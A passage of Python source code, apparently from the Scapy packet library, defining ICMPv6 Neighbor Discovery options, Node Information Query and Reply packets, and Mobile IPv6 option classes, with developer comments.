BitField("R", 1, 1),
|
BitField("res", 0, 7),
|
IntField("validlifetime", 0xffffffff),
|
IP6Field("addr", "::") ]
|
|
|
class _IP6PrefixField(IP6Field):
|
__slots__ = ["length_from"]
|
def __init__(self, name, default):
|
IP6Field.__init__(self, name, default)
|
self.length_from = lambda pkt: 8*(pkt.len - 1)
|
|
def addfield(self, pkt, s, val):
|
return s + self.i2m(pkt, val)
|
|
def getfield(self, pkt, s):
|
l = self.length_from(pkt)
|
p = s[:l]
|
if l < 16:
|
p += b'\x00'*(16-l)
|
return s[l:], self.m2i(pkt,p)
|
|
def i2len(self, pkt, x):
|
return len(self.i2m(pkt, x))
|
|
def i2m(self, pkt, x):
|
l = pkt.len
|
|
if x is None:
|
x = "::"
|
if l is None:
|
l = 1
|
x = inet_pton(socket.AF_INET6, x)
|
|
if l is None:
|
return x
|
if l in [0, 1]:
|
return b""
|
if l in [2, 3]:
|
return x[:8*(l-1)]
|
|
return x + b'\x00'*8*(l-3)
|
|
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
|
name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
|
fields_desc = [ ByteField("type",24),
|
FieldLenField("len", None, length_of="prefix", fmt="B",
|
adjust = lambda pkt,x: x//8 + 1),
|
ByteField("plen", None),
|
BitField("res1",0,3),
|
BitField("prf",0,2),
|
BitField("res2",0,3),
|
IntField("rtlifetime", 0xffffffff),
|
_IP6PrefixField("prefix", None) ]
|
|
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
|
name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
|
fields_desc = [ ByteField("type", 25),
|
FieldLenField("len", None, count_of="dns", fmt="B",
|
adjust = lambda pkt,x: 2*x+1),
|
ShortField("res", None),
|
IntField("lifetime", 0xffffffff),
|
IP6ListField("dns", [],
|
length_from = lambda pkt: 8*(pkt.len-1)) ]
|
|
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
|
name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
|
fields_desc = [ ByteField("type", 26),
|
ByteField("len", 1),
|
BitField("res", 0, 48) ]
|
|
# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
|
# described in section 3.1 of RFC 1035
|
# XXX Label should be at most 63 octets in length : we do not enforce it
|
# Total length of domain should be 255 : we do not enforce it either
|
class DomainNameListField(StrLenField):
|
__slots__ = ["padded"]
|
islist = 1
|
padded_unit = 8
|
|
def __init__(self, name, default, fld=None, length_from=None, padded=False):
|
self.padded = padded
|
StrLenField.__init__(self, name, default, fld, length_from)
|
|
def i2len(self, pkt, x):
|
return len(self.i2m(pkt, x))
|
|
def m2i(self, pkt, x):
|
x = plain_str(x) # Decode bytes to string
|
res = []
|
while x:
|
# Get a name until \x00 is reached
|
cur = []
|
while x and ord(x[0]) != 0:
|
l = ord(x[0])
|
cur.append(x[1:l+1])
|
x = x[l+1:]
|
if self.padded:
|
# Discard following \x00 in padded mode
|
if len(cur):
|
res.append(".".join(cur) + ".")
|
else:
|
# Store the current name
|
res.append(".".join(cur) + ".")
|
if x and ord(x[0]) == 0:
|
x = x[1:]
|
return res
|
|
def i2m(self, pkt, x):
|
def conditionalTrailingDot(z):
|
if z and orb(z[-1]) == 0:
|
return z
|
return z+b'\x00'
|
# Build the encode names
|
tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes
|
ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
|
|
# In padded mode, add some \x00 bytes
|
if self.padded and not len(ret_string) % self.padded_unit == 0:
|
ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)
|
|
return ret_string
|
|
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
|
name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
|
fields_desc = [ ByteField("type", 31),
|
FieldLenField("len", None, length_of="searchlist", fmt="B",
|
adjust=lambda pkt, x: 1+ x//8),
|
ShortField("res", None),
|
IntField("lifetime", 0xffffffff),
|
DomainNameListField("searchlist", [],
|
length_from=lambda pkt: 8*pkt.len -8,
|
padded=True)
|
]
|
|
# End of ICMPv6 Neighbor Discovery Options.
|
|
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
|
name = "ICMPv6 Neighbor Discovery - Router Solicitation"
|
fields_desc = [ ByteEnumField("type", 133, icmp6types),
|
ByteField("code",0),
|
XShortField("cksum", None),
|
IntField("res",0) ]
|
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::2", "hlim": 255 }}
|
|
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
|
name = "ICMPv6 Neighbor Discovery - Router Advertisement"
|
fields_desc = [ ByteEnumField("type", 134, icmp6types),
|
ByteField("code",0),
|
XShortField("cksum", None),
|
ByteField("chlim",0),
|
BitField("M",0,1),
|
BitField("O",0,1),
|
BitField("H",0,1),
|
BitEnumField("prf",1,2, { 0: "Medium (default)",
|
1: "High",
|
2: "Reserved",
|
3: "Low" } ), # RFC 4191
|
BitField("P",0,1),
|
BitField("res",0,2),
|
ShortField("routerlifetime",1800),
|
IntField("reachabletime",0),
|
IntField("retranstimer",0) ]
|
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
|
|
def answers(self, other):
|
return isinstance(other, ICMPv6ND_RS)
|
|
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
|
name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
|
fields_desc = [ ByteEnumField("type",135, icmp6types),
|
ByteField("code",0),
|
XShortField("cksum", None),
|
IntField("res", 0),
|
IP6Field("tgt","::") ]
|
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
|
|
def mysummary(self):
|
return self.sprintf("%name% (tgt: %tgt%)")
|
|
def hashret(self):
|
return raw(self.tgt)+self.payload.hashret()
|
|
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
|
name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
|
fields_desc = [ ByteEnumField("type",136, icmp6types),
|
ByteField("code",0),
|
XShortField("cksum", None),
|
BitField("R",1,1),
|
BitField("S",0,1),
|
BitField("O",1,1),
|
XBitField("res",0,29),
|
IP6Field("tgt","::") ]
|
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
|
|
def mysummary(self):
|
return self.sprintf("%name% (tgt: %tgt%)")
|
|
def hashret(self):
|
return raw(self.tgt)+self.payload.hashret()
|
|
def answers(self, other):
|
return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
|
|
# associated possible options : target link-layer option, Redirected header
|
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
|
name = "ICMPv6 Neighbor Discovery - Redirect"
|
fields_desc = [ ByteEnumField("type",137, icmp6types),
|
ByteField("code",0),
|
XShortField("cksum", None),
|
XIntField("res",0),
|
IP6Field("tgt","::"),
|
IP6Field("dst","::") ]
|
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
|
|
|
|
################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############
|
|
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
|
name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
|
fields_desc = [ ByteField("type",9),
|
FieldLenField("len", None, count_of="addrlist", fmt="B",
|
adjust = lambda pkt,x: 2*x+1),
|
StrFixedLenField("res", b"\x00"*6, 6),
|
IP6ListField("addrlist", [],
|
length_from = lambda pkt: 8*(pkt.len-1)) ]
|
|
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
|
name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
|
type = 10
|
|
|
# RFC3122
|
# Options requises : source lladdr et target lladdr
|
# Autres options valides : source address list, MTU
|
# - Comme precise dans le document, il serait bien de prendre l'adresse L2
|
# demandee dans l'option requise target lladdr et l'utiliser au niveau
|
# de l'adresse destination ethernet si aucune adresse n'est precisee
|
# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
|
# les options.
|
# Ether() must use the target lladdr as destination
|
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
|
name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
|
fields_desc = [ ByteEnumField("type",141, icmp6types),
|
ByteField("code",0),
|
XShortField("cksum",None),
|
XIntField("reserved",0) ]
|
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
|
|
# Options requises : target lladdr, target address list
|
# Autres options valides : MTU
|
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
|
name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
|
fields_desc = [ ByteEnumField("type",142, icmp6types),
|
ByteField("code",0),
|
XShortField("cksum",None),
|
XIntField("reserved",0) ]
|
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
|
|
|
###############################################################################
|
# ICMPv6 Node Information Queries (RFC 4620)
|
###############################################################################
|
|
# [ ] Add automatic destination address computation using computeNIGroupAddr
|
# in IPv6 class (Scapy6 modification when integrated) if :
|
# - it is not provided
|
# - upper layer is ICMPv6NIQueryName() with a valid value
|
# [ ] Try to be liberal in what we accept as internal values for _explicit_
|
# DNS elements provided by users. Any string should be considered
|
# valid and kept like it has been provided. At the moment, i2repr() will
|
# crash on many inputs
|
# [ ] Do the documentation
|
# [ ] Add regression tests
|
# [ ] Perform test against real machines (NOOP reply is proof of implementation).
|
# [ ] Check if there are differences between different stacks. Among *BSD,
|
# with others.
|
# [ ] Deal with flags in a consistent way.
|
# [ ] Implement compression in names2dnsrepr() and decompresiion in
|
# dnsrepr2names(). Should be deactivable.
|
|
icmp6_niqtypes = { 0: "NOOP",
|
2: "Node Name",
|
3: "IPv6 Address",
|
4: "IPv4 Address" }
|
|
|
class _ICMPv6NIHashret:
|
def hashret(self):
|
return self.nonce
|
|
class _ICMPv6NIAnswers:
|
def answers(self, other):
|
return self.nonce == other.nonce
|
|
# Buggy; always returns the same value during a session
|
class NonceField(StrFixedLenField):
|
def __init__(self, name, default=None):
|
StrFixedLenField.__init__(self, name, default, 8)
|
if default is None:
|
self.default = self.randval()
|
|
@conf.commands.register
|
def computeNIGroupAddr(name):
|
"""Compute the NI group Address. Can take a FQDN as input parameter"""
|
name = name.lower().split(".")[0]
|
record = chr(len(name))+name
|
h = md5(record.encode("utf8"))
|
h = h.digest()
|
addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
|
return addr
|
|
|
# Here is the deal. First, that protocol is a piece of shit. Then, we
|
# provide 4 classes for the different kinds of Requests (one for every
|
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
|
# data field class that is made to be smart by guessing the specific
|
# type of value provided :
|
#
|
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
|
# if not overridden by user
|
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
|
# if not overridden
|
# - Name in the other cases: code is set to 0, if not overridden by user
|
#
|
# Internal storage, is not only the value, but the a pair providing
|
# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
|
#
|
# Note : I merged getfield() and m2i(). m2i() should not be called
|
# directly anyway. Same remark for addfield() and i2m()
|
#
|
# -- arno
|
|
# "The type of information present in the Data field of a query is
|
# declared by the ICMP Code, whereas the type of information in a
|
# Reply is determined by the Qtype"
|
|
def names2dnsrepr(x):
|
"""
|
Take as input a list of DNS names or a single DNS name
|
and encode it in DNS format (with possible compression)
|
If a string that is already a DNS name in DNS format
|
is passed, it is returned unmodified. Result is a string.
|
!!! At the moment, compression is not implemented !!!
|
"""
|
|
if isinstance(x, bytes):
|
if x and x[-1:] == b'\x00': # stupid heuristic
|
return x
|
x = [x]
|
|
res = []
|
for n in x:
|
termin = b"\x00"
|
if n.count(b'.') == 0: # single-component gets one more
|
termin += b'\x00'
|
n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
|
res.append(n)
|
return b"".join(res)
|
|
|
def dnsrepr2names(x):
|
"""
|
Take as input a DNS encoded string (possibly compressed)
|
and returns a list of DNS names contained in it.
|
If provided string is already in printable format
|
(does not end with a null character, a one element list
|
is returned). Result is a list.
|
"""
|
res = []
|
cur = b""
|
while x:
|
l = orb(x[0])
|
x = x[1:]
|
if not l:
|
if cur and cur[-1:] == b'.':
|
cur = cur[:-1]
|
res.append(cur)
|
cur = b""
|
if x and orb(x[0]) == 0: # single component
|
x = x[1:]
|
continue
|
if l & 0xc0: # XXX TODO : work on that -- arno
|
raise Exception("DNS message can't be compressed at this point!")
|
cur += x[:l] + b"."
|
x = x[l:]
|
return res
|
|
|
class NIQueryDataField(StrField):
|
def __init__(self, name, default):
|
StrField.__init__(self, name, default)
|
|
def i2h(self, pkt, x):
|
if x is None:
|
return x
|
t,val = x
|
if t == 1:
|
val = dnsrepr2names(val)[0]
|
return val
|
|
def h2i(self, pkt, x):
|
if x is tuple and isinstance(x[0], int):
|
return x
|
|
# Try IPv6
|
try:
|
inet_pton(socket.AF_INET6, x.decode())
|
return (0, x.decode())
|
except:
|
pass
|
# Try IPv4
|
try:
|
inet_pton(socket.AF_INET, x.decode())
|
return (2, x.decode())
|
except:
|
pass
|
# Try DNS
|
if x is None:
|
x = b""
|
x = names2dnsrepr(x)
|
return (1, x)
|
|
def i2repr(self, pkt, x):
|
x = plain_str(x)
|
t,val = x
|
if t == 1: # DNS Name
|
# we don't use dnsrepr2names() to deal with
|
# possible weird data extracted info
|
res = []
|
while val:
|
l = orb(val[0])
|
val = val[1:]
|
if l == 0:
|
break
|
res.append(val[:l]+".")
|
val = val[l:]
|
tmp = "".join(res)
|
if tmp and tmp[-1] == '.':
|
tmp = tmp[:-1]
|
return tmp
|
return repr(val)
|
|
def getfield(self, pkt, s):
|
qtype = getattr(pkt, "qtype")
|
if qtype == 0: # NOOP
|
return s, (0, b"")
|
else:
|
code = getattr(pkt, "code")
|
if code == 0: # IPv6 Addr
|
return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
|
elif code == 2: # IPv4 Addr
|
return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
|
else: # Name or Unknown
|
return b"", (1, s)
|
|
def addfield(self, pkt, s, val):
|
if ((isinstance(val, tuple) and val[1] is None) or
|
val is None):
|
val = (1, b"")
|
t = val[0]
|
if t == 1:
|
return s + val[1]
|
elif t == 0:
|
return s + inet_pton(socket.AF_INET6, val[1])
|
else:
|
return s + inet_pton(socket.AF_INET, val[1])
|
|
class NIQueryCodeField(ByteEnumField):
|
def i2m(self, pkt, x):
|
if x is None:
|
d = pkt.getfieldval("data")
|
if d is None:
|
return 1
|
elif d[0] == 0: # IPv6 address
|
return 0
|
elif d[0] == 1: # Name
|
return 1
|
elif d[0] == 2: # IPv4 address
|
return 2
|
else:
|
return 1
|
return x
|
|
|
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
|
|
#_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
|
# 8: "Link-local addresses", 16: "Site-local addresses",
|
# 32: "Global addresses" }
|
|
# "This NI type has no defined flags and never has a Data Field". Used
|
# to know if the destination is up and implements NI protocol.
|
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
|
name = "ICMPv6 Node Information Query - NOOP Query"
|
fields_desc = [ ByteEnumField("type", 139, icmp6types),
|
NIQueryCodeField("code", None, _niquery_code),
|
XShortField("cksum", None),
|
ShortEnumField("qtype", 0, icmp6_niqtypes),
|
BitField("unused", 0, 10),
|
FlagsField("flags", 0, 6, "TACLSG"),
|
NonceField("nonce", None),
|
NIQueryDataField("data", None) ]
|
|
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
|
name = "ICMPv6 Node Information Query - IPv6 Name Query"
|
qtype = 2
|
|
# We ask for the IPv6 address of the peer
|
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
|
name = "ICMPv6 Node Information Query - IPv6 Address Query"
|
qtype = 3
|
flags = 0x3E
|
|
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
|
name = "ICMPv6 Node Information Query - IPv4 Address Query"
|
qtype = 4
|
|
_nireply_code = { 0: "Successful Reply",
|
1: "Response Refusal",
|
3: "Unknown query type" }
|
|
_nireply_flags = { 1: "Reply set incomplete",
|
2: "All unicast addresses",
|
4: "IPv4 addresses",
|
8: "Link-local addresses",
|
16: "Site-local addresses",
|
32: "Global addresses" }
|
|
# Internal repr is one of those :
|
# (0, "some string") : unknow qtype value are mapped to that one
|
# (3, [ (ttl, ip6), ... ])
|
# (4, [ (ttl, ip4), ... ])
|
# (2, [ttl, dns_names]) : dns_names is one string that contains
|
# all the DNS names. Internally it is kept ready to be sent
|
# (undissected). i2repr() decode it for user. This is to
|
# make build after dissection bijective.
|
#
|
# I also merged getfield() and m2i(), and addfield() and i2m().
|
class NIReplyDataField(StrField):
|
|
def i2h(self, pkt, x):
|
if x is None:
|
return x
|
t,val = x
|
if t == 2:
|
ttl, dnsnames = val
|
val = [ttl] + dnsrepr2names(dnsnames)
|
return val
|
|
def h2i(self, pkt, x):
|
qtype = 0 # We will decode it as string if not
|
# overridden through 'qtype' in pkt
|
|
# No user hint, let's use 'qtype' value for that purpose
|
if not isinstance(x, tuple):
|
if pkt is not None:
|
qtype = pkt.qtype
|
else:
|
qtype = x[0]
|
x = x[1]
|
|
# From that point on, x is the value (second element of the tuple)
|
|
if qtype == 2: # DNS name
|
if isinstance(x, (str, bytes)): # listify the string
|
x = [x]
|
if isinstance(x, list):
|
x = [val.encode() if isinstance(val, str) else val for val in x]
|
if x and isinstance(x[0], six.integer_types):
|
ttl = x[0]
|
names = x[1:]
|
else:
|
ttl = 0
|
names = x
|
return (2, [ttl, names2dnsrepr(names)])
|
|
elif qtype in [3, 4]: # IPv4 or IPv6 addr
|
if not isinstance(x, list):
|
x = [x] # User directly provided an IP, instead of list
|
|
def fixvalue(x):
|
# List elements are not tuples, user probably
|
# omitted ttl value : we will use 0 instead
|
if not isinstance(x, tuple):
|
x = (0, x)
|
# Decode bytes
|
if six.PY3 and isinstance(x[1], bytes):
|
x = (x[0], x[1].decode())
|
return x
|
|
return (qtype, [fixvalue(d) for d in x])
|
|
return (qtype, x)
|
|
|
def addfield(self, pkt, s, val):
|
t,tmp = val
|
if tmp is None:
|
tmp = b""
|
if t == 2:
|
ttl,dnsstr = tmp
|
return s+ struct.pack("!I", ttl) + dnsstr
|
elif t == 3:
|
return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0])+inet_pton(socket.AF_INET6, x_y1[1]), tmp))
|
elif t == 4:
|
return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0])+inet_pton(socket.AF_INET, x_y2[1]), tmp))
|
else:
|
return s + tmp
|
|
def getfield(self, pkt, s):
|
code = getattr(pkt, "code")
|
if code != 0:
|
return s, (0, b"")
|
|
qtype = getattr(pkt, "qtype")
|
if qtype == 0: # NOOP
|
return s, (0, b"")
|
|
elif qtype == 2:
|
if len(s) < 4:
|
return s, (0, b"")
|
ttl = struct.unpack("!I", s[:4])[0]
|
return b"", (2, [ttl, s[4:]])
|
|
elif qtype == 3: # IPv6 addresses with TTLs
|
# XXX TODO : get the real length
|
res = []
|
while len(s) >= 20: # 4 + 16
|
ttl = struct.unpack("!I", s[:4])[0]
|
ip = inet_ntop(socket.AF_INET6, s[4:20])
|
res.append((ttl, ip))
|
s = s[20:]
|
return s, (3, res)
|
|
elif qtype == 4: # IPv4 addresses with TTLs
|
# XXX TODO : get the real length
|
res = []
|
while len(s) >= 8: # 4 + 4
|
ttl = struct.unpack("!I", s[:4])[0]
|
ip = inet_ntop(socket.AF_INET, s[4:8])
|
res.append((ttl, ip))
|
s = s[8:]
|
return s, (4, res)
|
else:
|
# XXX TODO : implement me and deal with real length
|
return b"", (0, s)
|
|
def i2repr(self, pkt, x):
|
if x is None:
|
return "[]"
|
|
if isinstance(x, tuple) and len(x) == 2:
|
t, val = x
|
if t == 2: # DNS names
|
ttl,l = val
|
l = dnsrepr2names(l)
|
return "ttl:%d %s" % (ttl, ", ".join(l))
|
elif t == 3 or t == 4:
|
return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val)))
|
return repr(val)
|
return repr(x) # XXX should not happen
|
|
# By default, sent responses have code set to 0 (successful)
|
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
|
name = "ICMPv6 Node Information Reply - NOOP Reply"
|
fields_desc = [ ByteEnumField("type", 140, icmp6types),
|
ByteEnumField("code", 0, _nireply_code),
|
XShortField("cksum", None),
|
ShortEnumField("qtype", 0, icmp6_niqtypes),
|
BitField("unused", 0, 10),
|
FlagsField("flags", 0, 6, "TACLSG"),
|
NonceField("nonce", None),
|
NIReplyDataField("data", None)]
|
|
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
|
name = "ICMPv6 Node Information Reply - Node Names"
|
qtype = 2
|
|
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
|
name = "ICMPv6 Node Information Reply - IPv6 addresses"
|
qtype = 3
|
|
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
|
name = "ICMPv6 Node Information Reply - IPv4 addresses"
|
qtype = 4
|
|
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
|
name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
|
code = 1
|
|
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
|
name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
|
code = 2
|
|
|
def _niquery_guesser(p):
|
cls = conf.raw_layer
|
type = orb(p[0])
|
if type == 139: # Node Info Query specific stuff
|
if len(p) > 6:
|
qtype, = struct.unpack("!H", p[4:6])
|
cls = { 0: ICMPv6NIQueryNOOP,
|
2: ICMPv6NIQueryName,
|
3: ICMPv6NIQueryIPv6,
|
4: ICMPv6NIQueryIPv4 }.get(qtype, conf.raw_layer)
|
elif type == 140: # Node Info Reply specific stuff
|
code = orb(p[1])
|
if code == 0:
|
if len(p) > 6:
|
qtype, = struct.unpack("!H", p[4:6])
|
cls = { 2: ICMPv6NIReplyName,
|
3: ICMPv6NIReplyIPv6,
|
4: ICMPv6NIReplyIPv4 }.get(qtype, ICMPv6NIReplyNOOP)
|
elif code == 1:
|
cls = ICMPv6NIReplyRefuse
|
elif code == 2:
|
cls = ICMPv6NIReplyUnknown
|
return cls
|
|
|
#############################################################################
|
#############################################################################
|
### Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) ###
|
#############################################################################
|
#############################################################################
|
|
# Mobile IPv6 ICMPv6 related classes
|
|
class ICMPv6HAADRequest(_ICMPv6):
|
name = 'ICMPv6 Home Agent Address Discovery Request'
|
fields_desc = [ ByteEnumField("type", 144, icmp6types),
|
ByteField("code", 0),
|
XShortField("cksum", None),
|
XShortField("id", None),
|
BitEnumField("R", 1, 1, {1: 'MR'}),
|
XBitField("res", 0, 15) ]
|
def hashret(self):
|
return struct.pack("!H",self.id)+self.payload.hashret()
|
|
class ICMPv6HAADReply(_ICMPv6):
|
name = 'ICMPv6 Home Agent Address Discovery Reply'
|
fields_desc = [ ByteEnumField("type", 145, icmp6types),
|
ByteField("code", 0),
|
XShortField("cksum", None),
|
XShortField("id", None),
|
BitEnumField("R", 1, 1, {1: 'MR'}),
|
XBitField("res", 0, 15),
|
IP6ListField('addresses', None) ]
|
def hashret(self):
|
return struct.pack("!H",self.id)+self.payload.hashret()
|
|
def answers(self, other):
|
if not isinstance(other, ICMPv6HAADRequest):
|
return 0
|
return self.id == other.id
|
|
class ICMPv6MPSol(_ICMPv6):
|
name = 'ICMPv6 Mobile Prefix Solicitation'
|
fields_desc = [ ByteEnumField("type", 146, icmp6types),
|
ByteField("code", 0),
|
XShortField("cksum", None),
|
XShortField("id", None),
|
XShortField("res", 0) ]
|
def _hashret(self):
|
return struct.pack("!H",self.id)
|
|
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
|
name = 'ICMPv6 Mobile Prefix Advertisement'
|
fields_desc = [ ByteEnumField("type", 147, icmp6types),
|
ByteField("code", 0),
|
XShortField("cksum", None),
|
XShortField("id", None),
|
BitEnumField("flags", 2, 2, {2: 'M', 1:'O'}),
|
XBitField("res", 0, 14) ]
|
def hashret(self):
|
return struct.pack("!H",self.id)
|
|
def answers(self, other):
|
return isinstance(other, ICMPv6MPSol)
|
|
# Mobile IPv6 Options classes
|
|
|
_mobopttypes = { 2: "Binding Refresh Advice",
|
3: "Alternate Care-of Address",
|
4: "Nonce Indices",
|
5: "Binding Authorization Data",
|
6: "Mobile Network Prefix (RFC3963)",
|
7: "Link-Layer Address (RFC4068)",
|
8: "Mobile Node Identifier (RFC4283)",
|
9: "Mobility Message Authentication (RFC4285)",
|
10: "Replay Protection (RFC4285)",
|
11: "CGA Parameters Request (RFC4866)",
|
12: "CGA Parameters (RFC4866)",
|
13: "Signature (RFC4866)",
|
14: "Home Keygen Token (RFC4866)",
|
15: "Care-of Test Init (RFC4866)",
|
16: "Care-of Test (RFC4866)" }
|
|
|
class _MIP6OptAlign:
|
""" Mobile IPv6 options have alignment requirements of the form x*n+y.
|
This class is inherited by all MIPv6 options to help in computing the
|
required Padding for that option, i.e. the need for a Pad1 or PadN
|
option before it. They only need to provide x and y as class
|
parameters. (x=0 and y=0 are used when no alignment is required)"""
|
def alignment_delta(self, curpos):
|
x = self.x ; y = self.y
|
if x == 0 and y ==0:
|
return 0
|
delta = x*((curpos - y + x - 1)//x) + y - curpos
|
return delta
|
|
|
class MIP6OptBRAdvice(_MIP6OptAlign, Packet):
|
name = 'Mobile IPv6 Option - Binding Refresh Advice'
|
fields_desc = [ ByteEnumField('otype', 2, _mobopttypes),
|
ByteField('olen', 2),
|
ShortField('rinter', 0) ]
|
x = 2 ; y = 0# alignment requirement: 2n
|
|
class MIP6OptAltCoA(_MIP6OptAlign, Packet):
|
name = 'MIPv6 Option - Alternate Care-of Address'
|
fields_desc = [ ByteEnumField('otype', 3, _mobopttypes),
|
ByteField('olen', 16),
|
IP6Field("acoa", "::") ]
|
x = 8 ; y = 6 # alignment requirement: 8n+6
|
|
class MIP6OptNonceIndices(_MIP6OptAlign, Packet):
|
name = 'MIPv6 Option - Nonce Indices'
|
fields_desc = [ ByteEnumField('otype', 4, _mobopttypes),
|
ByteField('olen', 16),
|
ShortField('hni', 0),
|
ShortField('coni', 0) ]
|
x = 2 ; y = 0 # alignment requirement: 2n
|
|
class MIP6OptBindingAuthData(_MIP6OptAlign, Packet):
|
name = 'MIPv6 Option - Binding Authorization Data'
|
fields_desc = [ ByteEnumField('otype', 5, _mobopttypes),
|
ByteField('olen', 16),
|
BitField('authenticator', 0, 96) ]
|
x = 8 ; y = 2 # alignment requirement: 8n+2
|
|
class MIP6OptMobNetPrefix(_MIP6OptAlign, Packet): # NEMO - RFC 3963
|
name = 'NEMO Option - Mobile Network Prefix'
|
fields_desc = [ ByteEnumField("otype", 6, _mobopttypes),
|
ByteField("olen", 18),
|
ByteField("reserved", 0),
|
ByteField("plen", 64),
|
IP6Field("prefix", "::") ]
|
x = 8 ; y = 4 # alignment requirement: 8n+4
|
|
class MIP6OptLLAddr(_MIP6OptAlign, Packet): # Sect 6.4.4 of RFC 4068
|
name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
|
fields_desc = [ ByteEnumField("otype", 7, _mobopttypes),
|
ByteField("olen", 7),
|
ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
|
ByteField("pad", 0),
|
MACField("lla", ETHER_ANY) ] # Only support ethernet
|
x = 0 ; y = 0 # alignment requirement: none
|
|
class MIP6OptMNID(_MIP6OptAlign, Packet): # RFC 4283
|
name = "MIPv6 Option - Mobile Node Identifier"
|
fields_desc = [ ByteEnumField("otype", 8, _mobopttypes),
|
FieldLenField("olen", None, length_of="id", fmt="B",
|
adjust = lambda pkt,x: x+1),
|
ByteEnumField("subtype", 1, {1: "NAI"}),
|
StrLenField("id", "",
|
length_from = lambda pkt: pkt.olen-1) ]
|
x = 0 ; y = 0 # alignment requirement: none
|
|
# We only support decoding and basic build. Automatic HMAC computation is
|
# too much work for our current needs. It is left to the user (I mean ...
|
# you). --arno
|
class MIP6OptMsgAuth(_MIP6OptAlign, Packet): # RFC 4285 (Sect. 5)
|
name = "MIPv6 Option - Mobility Message Authentication"
|
fields_desc = [ ByteEnumField("otype", 9, _mobopttypes),
|
FieldLenField("olen", None, length_of="authdata", fmt="B",
|
adjust = lambda pkt,x: x+5),
|
ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",
|
2: "MN-AAA authentication mobility option"}),
|
IntField("mspi", None),
|
StrLenField("authdata", "A"*12,
|
length_from = lambda pkt: pkt.olen-5) ]
|
x = 4 ; y = 1 # alignment requirement: 4n+1
|
|
# Extracted from RFC 1305 (NTP) :
|
# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
|
# in seconds relative to 0h on 1 January 1900. The integer part is in the
|
# first 32 bits and the fraction part in the last 32 bits.
|
class NTPTimestampField(LongField):
|
def i2repr(self, pkt, x):
|
if x < ((50*31536000)<<32):
|
return "Some date a few decades ago (%d)" % x
|
|
# delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
|
# January 1st 1970 :
|
delta = -2209075761
|
i = int(x >> 32)
|
